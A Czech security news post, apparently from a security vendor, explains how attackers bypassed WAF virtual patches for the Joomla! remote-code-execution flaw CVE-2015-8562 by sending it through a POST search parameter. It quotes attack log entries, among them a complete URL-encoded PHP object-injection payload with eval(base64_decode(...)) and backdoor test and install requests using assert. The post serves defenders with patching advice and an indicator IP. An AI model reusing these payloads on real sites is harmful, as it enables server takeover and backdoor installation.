18 July 2016

Virtuální záplatování se ukázalo být neučínné po starém Oday zásahu webových stránek Joomla!

Virtuální záplatování se ukázalo být neučínné po starém Oday zásahu webových stránek Joomla!

Téměř každé řešení WAF (Web Application Firewall) lze obejít pomocí ošemetných a sofistikovaných technik nebo jinými útočnými vektory. Blog, který publikoval Sucuri to dokonale demonstruje.

Krátký příběh: Loni jsme uvědomili o závažné zranitelnosti v Joomla! (CVE-2015-8562), která vedla ke vzdálenému spuštění PHP kódu. Exploit pro tuto zranitelnost se velmi rychle dostal na veřejnost na základě kompromitování mnoha webových stránek. Vendor vydal záplatu a mnoho majitelů webových stránek si ji nainstalovali. Někteří z nich však příliš důvěřovali technologii WAF a virtuálnímu záplatování, namísto instalace aktuální záplaty. Virtuální záplata pro tuto konkrétní zranitelnost byla rychle implementována správci WAF a všichni žili šťastně až do smrti, dokud...nebyl zaveden nový vektor útoku.

Nový přístup používal neznámý vektor pomocí „filtru vyhledávání“ volby v rámci HTTP POST požadavku namísto HTTP User-Agent hlavičky. To umožnilo obejít implementovaná WAF pravidla a úspěšně kompromitovat webové stránky bez aktualizace. Nový exploit vypadá v log souborech takto:

46.183.219.91 - - [19/Jun/2016:03:16:21 -0400]

"POST /?option=com_tags HTTP/1.1" 403 4229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" 

"POSTLOG:filter-search=bigus%7D__hxsjcurrrt%7CO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A6%3A%22assert%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A71%3A%22eval%28base64_decode%28%24_SERVER%5B%27HTTP_QGYSD%27%5D%29%29%3BJFactory%3A%3AgetConfig%28%29%3Bexit%3B%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7D\xF0\xFD\xFD\xFD" 

Podle šetření Sucuri hackeři zavedli “backdoor” v červnu, ale nevyužili jej až do července. Níže je uvedený příklad testu, provedený škodlivými činiteli k testování úspěšné backdoorové instalace:

46.183.219.91 - - [01/Jul/2016:04:41:20 -0400]

"POST /modules/cache.uniq_04793.php HTTP/1.1" 403 4261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" 

"POSTLOG:&php_func=assert&php=print%28%22MY_S%22.%22UCCESS%22%29%3B" 

Backdoorová instalace:

46.183.219.91 - - [01/Jul/2016:09:35:27 -0400] 

"POST /modules/cache.uniq_04793.php HTTP/1.1" 403 4261 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" 

"POSTLOG:&php_func=assert&php=assert%28base64_decode%28str_rot13%28%27MKMuoPuvLKAyAwEsMTIwo2EyXUA0py9lo3DkZltaHHEwnaO6rJukHR52EwWWAHDlqKyZZzqHpUb5nUSDIwqEETWOHUMSHxIVI0ySoGOgDzbjJRAgAQuQZ09vpR4jJSSRLauhFwIxFmWOnH1HFUEQEx5uD1IOq3O6rJckHR9zGRb1LKSXH2SAEmO2EacGZxkWDKqjraydpIOJqUSIrJcAEmO2pIEWAUSDBIuZF011FQWOoT5YGmOJqx9gpUcnBIM6qGOkIH42JJj5oR1XH2MjZ0I1pIE5oKSHrKqjoQIdpUb4nJ5uJzyZFwI1o1I5ZT5XDJ1M….”

Doporučujeme majitelům webových stránek Joomla! Zkontrolovat jejich protokoly pro přítomnost IP adresy 46.183.219.91 vztahující se k tomuto incidentu.

Doporučujeme instalování poslední verze Joomla 3.4.6 nebo vyšší, která řeší tuto zranitelnost.


Přečíst všechny články

Poslední posty

334 zranitelností nultého dne bylo od roku 2006 využito během APT útoků

334 zranitelností nultého dne bylo od roku 2006 využito během APT útoků

Náš výzkum pokrývá chyby zabezpečení toho nejnebezpečnějšího druhu – ty, které nezná nikdo jiný než útočníci.
7 June 2017
WordPress zranitelnost v REST API je aktivně exploitována

WordPress zranitelnost v REST API je aktivně exploitována

Byl zaregistrován útok proti nezáplatovaným WordPress webům.
7 February 2017
Dostupný exploit pro 0day zranitelnost v Microsoft Windows

Dostupný exploit pro 0day zranitelnost v Microsoft Windows

Zranitelnost může být použita ke vzdálenému spuštění libovolného kódu ve zranitelném systému.

3 February 2017